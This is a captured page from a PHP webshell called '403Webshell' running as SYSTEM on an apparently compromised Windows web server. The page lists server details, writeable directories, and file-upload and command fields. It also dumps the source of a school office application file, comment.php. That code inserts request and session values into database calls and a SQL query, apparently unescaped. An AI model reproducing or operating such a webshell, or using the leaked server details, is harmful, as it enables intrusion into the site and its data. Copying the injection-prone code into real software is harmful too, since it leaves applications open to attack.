403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myoffice/2565/modules/tkk8_backup/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myoffice/2565/modules/tkk8_backup/comment.php
<?
if(!$_POST[CATNO] ){
	echo "<script language='javascript'>" ;
	echo "alert('!!!! กรุณากรอกข้อมูลต่างๆให้ครบถ้วนครับ !!!!')" ;
	echo "</script>" ;
	echo "<script language='javascript'>javascript:history.go(-1)</script>";
	exit() ;
}
checkban($_POST[CATNO]);

$_GET['id'] = intval($_GET['id']);
//ทำการเพิ่มข้อมูลลงดาต้าเบส
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$db->add_db(TB_TKK8_COMMENT,array(
	"tkk8_id"=>"$_GET[id]",
	"catno"=>"$_POST[CATNO]",
	"ip"=>"".IPADDRESS."",
	"post_date"=>"".TIMESTAMP.""
));
$db->closedb ();
?>
		<TABLE cellSpacing=0 cellPadding=0 width=100% height=420 border=0>
        <TR>
          <TD align=center>	<BR><BR><BR><BR><B>

<CENTER><FONT COLOR="#336600"><B>ท่านลงทะเบียนรับเรียบร้อยแล้ว</FONT><BR><BR>
 <?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE username='".$_SESSION['usersch_user']."' ");
		$arr[usersch] = $db->fetch($res[usersch]);
?>
	<meta http-equiv="refresh" content="1 ;url=?name=tkk8&op=tkk8_read&category=<?=$arr[usersch][id];?>">
		  </TD>
        </TR>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit